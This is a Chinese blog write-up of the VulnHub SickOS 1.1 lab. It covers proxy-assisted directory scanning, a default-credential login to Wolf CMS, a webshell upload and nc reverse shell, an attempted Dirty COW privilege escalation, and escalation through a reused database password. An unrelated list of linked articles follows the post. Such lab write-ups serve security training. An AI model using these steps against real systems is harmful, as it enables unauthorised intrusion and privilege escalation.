VulnHub SICKOS: 1.1

2023-10-24 20:05
文章标签 1.1 vulnhub sickos

本文主要是介绍VulnHub SICKOS: 1.1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一、信息收集

1.nmap扫描

IP:192.168.103.177

开放端口:22、3128、8080

这里可以看到3128端口是作为代理使用的,所以想访问80端口必须走3128端口代理

2.利用burp挂上游代理

然后直接开代理,访问80端口

3.扫描目录

因为3128端口开了代理

┌──(root💀kali)-[~/routing/dirsearch-]
└─# dirb http://192.168.103.177 -p http://192.168.103.177:3128

http://192.168.103.177/robots.txt

发现/wolfcms目录

4.扫描/wolfcms目录

┌──(root💀kali)-[~/routing/dirsearch-]
└─# dirb http://192.168.103.177 -p http://192.168.103.177:3128/wolfcms/

在http://192.168.103.177/wolfcms/docs/updating.txt页面中记录了更新的信息,发现系统采用的cms版本最新是0.8.2,搜索对应版本后发现存在文件上传漏洞

通过网页链接测试出后台登录页面:http://192.168.103.177/wolfcms/?/admin/login,尝试admin:admin成功登录后台

二、漏洞利用

反弹shell

通过查看phpinfo()来查找文件上传的根目录

上传的木马保存到:/wolfcms/public/webshell.php目录下了

┌──(root💀kali)-[~/桌面]
└─# nc -lvvp 4444 python -c 'import pty; pty.spawn("/bin/bash")'  #交互式shell

三、提权

1.脏牛提权

脏牛漏洞

脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。

漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)

简要分析:该漏洞具体为,Linux内核的内存子系统在处理写入复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限。

先切换到有可写入权限的目录然后进行nc端口监听,开始的反弹shell用了4444端口,所以4444不能再用了www-data@ubuntu:/var/a$ nc -l 1234 > 40839.c
nc -l 1234 > 40839.c┌──(root💀kali)-[~/桌面]
└─# nc 192.168.103.184 1234 < 40839.c
gcc -pthread 40839.c -o dirty -lcrypt
./dirty 密码

发现无法使用脏牛提权

使用命令:gcc -pthread 40839.c -o dirty -lcrypt来编译exp,执行exp后发现靶机会自己修复,没法执行脏牛

2.再信息收集

继续寻找有效信息,
在/var/www/wolfcms/config.php中发现数据库的账户和密码:root:john@123

3.sudo提权

发现无法ssh连接,尝试利用别的方法登录

发现home目录下,还有一个sickos账户,猜测密码都是一个

账户和密码:root:john@123

4.root.txt

这篇关于VulnHub SICKOS: 1.1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/277480

相关文章

usaco 1.1 Broken Necklace(DP)

直接上代码 接触的第一道dp ps.大概的思路就是 先从左往右用一个数组在每个点记下蓝或黑的个数 再从右到左算一遍 最后取出最大的即可 核心语句在于: 如果 str[i] = 'r'  ,   rl[i]=rl[i-1]+1, bl[i]=0 如果 str[i] = 'b' ,  bl[i]=bl[i-1]+1, rl[i]=0 如果 str[i] = 'w',  bl[i]=b

【WebGPU Unleashed】1.1 绘制三角形

一部2024新的WebGPU教程,作者Shi Yan。内容很好,翻译过来与大家共享,内容上会有改动,加上自己的理解。更多精彩内容尽在 dt.sim3d.cn ,关注公众号【sky的数孪技术】,技术交流、源码下载请添加微信号:digital_twin123 在 3D 渲染领域,三角形是最基本的绘制元素。在这里,我们将学习如何绘制单个三角形。接下来我们将制作一个简单的着色器来定义三角形内的像素

1.1 Avtivity的生命周期全面分析

本文将Activity的生命周期分为两部分内容,一部分是典型情况下的生命周期,另一部分是异常情况下的生命周期。所谓典型情况下的生命周期,是指在有用户参与的情况下,Activity所经过的生命周期的改变;而异常情况下的生命周期是指在Activity被系统回收或者由于当前设备的Configuration发生改变从而导致Activity被销毁重建,异常情况下的生命周期的关注点和典型情况下略有不同。 1

2020 1.1版本的idea中git的使用场景

1、克隆项目 File-->New-->Project from Version Control 2、拉取远程的分支到本地 右下角-->(Remote Branches)选定分支-->checkout 3、将master分支更新的代码合并至bry分支并提交到远程仓库    (目的:实时与master的最新代码保持一致) 右下角-->(Local Branches)checkout br

Python二级知识点--1.1(计算机系统)

以下内容,皆为原创,感谢大家的关注和点赞。 考点:在执行指令的过程中,CPU不经过总线能直接访问的是寄存器 在执行指令的过程中,CPU 不经过总线能直接访问的是内部寄存器。   CPU 内部的寄存器通常与 CPU 的控制单元、算术逻辑单元等紧密集成,它们之间通过内部高速的数据通路进行连接,无需经过外部总线。   这是因为内部寄存器的访问速度对于 CPU 的高效运行至关重要。在指令执行的过程

[2]QMediaPlayer实现小播放器1.1

v1.1 在1.0的基础上做了背景上的美化,运行界面如图所示。 其中一个最麻烦的点是,显示时间的QLabel十分难看,我在ui设置样式表都行不通,最后还是一句话搞定了。 //控件透明ui->timeLabel->setAttribute(Qt::WA_TranslucentBackground,true); 然后就是尝试着文件的封装了,

ios私钥证书(p12)导入失败,Windows OpenSSl 1.1.1 下载

ios私钥证书(p12)导入失败 如果你用的OpenSSL版本是v3那么恭喜你V3必然报这个错,解决办法将OpenSSL 3降低成 v1。 Windows OpenSSl 1.1.1 下载 阿里云网盘下载地址:OpenSSL V1

Vulnhub靶场 | DC系列 - DC9

文章目录 DC-9环境搭建渗透测试端口敲门服务 DC-9 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀k

vulnhub靶场-DC2

一、环境配置 1.下载地址:https://www.vulnhub.com/entry/dc-2,311/ 2.靶场配置:Nat模式   更改hosts文件,官网提示需要更改hosts文件才能访问到网站,否则访问不了 kali进入编辑模式vim,添加上自己的靶机ip地址保存即可 vim /etc/hosts 3.攻击机:kali ip:192.168.111.12

Vulnhub靶场 | DC系列 - DC8

文章目录 DC-8环境搭建渗透测试 DC-8 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/